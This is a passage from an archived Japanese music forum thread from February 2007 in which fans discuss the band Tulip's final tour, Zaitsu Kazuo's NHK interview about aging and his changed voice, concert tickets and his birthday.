451 :NO MUSIC NO NAME:2007/02/05(月) 15:33:17 ID:qjDCSKnr
インドって電気通ってるのかな?

452 :NO MUSIC NO NAME:2007/02/05(月) 16:57:11 ID:tKSVhUs7
>>451
インドはIT産業がやたら発達してるらしいが、最近

453 :NO MUSIC NO NAME:2007/02/06(火) 20:38:45 ID:APe9Fx13
インドに行くならギターください

454 :NO MUSIC NO NAME:2007/02/07(水) 11:48:09 ID:AGbG96js
IT産業やたら発達してる割には大都会のデリーも停電だらけ牛だらけ

455 :NO MUSIC NO NAME:2007/02/09(金) 21:31:20 ID:jYjfIypi
最後のツアー、3回くらいは行きたいな。
メンバーそれぞれ好きだけど、やっぱりチューリップは
特別です。

456 :NO MUSIC NO NAME:2007/02/10(土) 15:03:19 ID:dXR2qx2i
今晩のNHK「@ヒューマン」に財津インタブー

457 :NO MUSIC NO NAME:2007/02/11(日) 10:15:13 ID:TCrfu57o
見のがしたー!見た人詳しく。

458 :NO MUSIC NO NAME:2007/02/11(日) 11:44:28 ID:CzzH89c4
もう年だから、とか
若い頃に作った歌は歌えない、とか
そんな感じでした。
昔からそんなことばかり言ってたような気がする。

459 :NO MUSIC NO NAME:2007/02/11(日) 12:04:57 ID:uNc+lQww
>458のとおり、
今までのインタビューやらエッセイやらと同じようなことだったけど
あとは
同世代(団塊の世代)に向けて歌っていきたい...
とか、か。
聞き手がつまんない人だったのが残念

しかしあとでスタジオの美輪さんに
自分で自分に年寄りだって暗示かけてる
みたいに突っ込まれてたな

460 :NO MUSIC NO NAME:2007/02/12(月) 15:23:58 ID:eF0fQV3x
残念だけど、確かに若い頃の歌声とはちがうよね。

小田さんの変わらない声は奇跡だな。

461 :NO MUSIC NO NAME:2007/02/12(月) 20:10:35 ID:YMJhGceM
昔よりPAの音小さい!

462 :NO MUSIC NO NAME:2007/02/13(火) 09:05:00 ID:R65X62vG
若い頃と同じ声だなんて変だよ変。

463 :NO MUSIC NO NAME:2007/02/13(火) 21:19:09 ID:dr12skZI
6月2日和光がとれたよー。たのしみ。

>>462
そうですよね。キーを下げて歌ってるアーティストも
いるし、いくつになっても「夢中さ君に」や「銀の指
輪」を歌っててほしいな。

464 :NO MUSIC NO NAME:2007/02/13(火) 23:12:12 ID:NQ31a6oN
PAの音量とキーだけは下げんといてー!

465 :NO MUSIC NO NAME:2007/02/14(水) 23:09:00 ID:oQQnH3Kv
http://www.nhk.or.jp/human-blog/03/608.html

466 :NO MUSIC NO NAME:2007/02/19(月) 00:23:41 ID:+ZNOualU
今日は財津さんの59才のお誕生日♪
おめでとうございます!

467 :NO MUSIC NO NAME:2007/02/21(水) 20:28:21 ID:y99CxECO
80以上現役で・・・90以上長生きして!

468 :NO MUSIC NO NAME:2007/02/21(水) 20:40:35 ID:y99CxECO
またドラマに出てくれたら嬉しいけど、ボクが思うに財津さんが司会もしくはレギュラーの音楽番組があればなーと。吉田拓郎みたいなヤツでもやってたくらいなのに。もっといろいろ出てー!

90 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)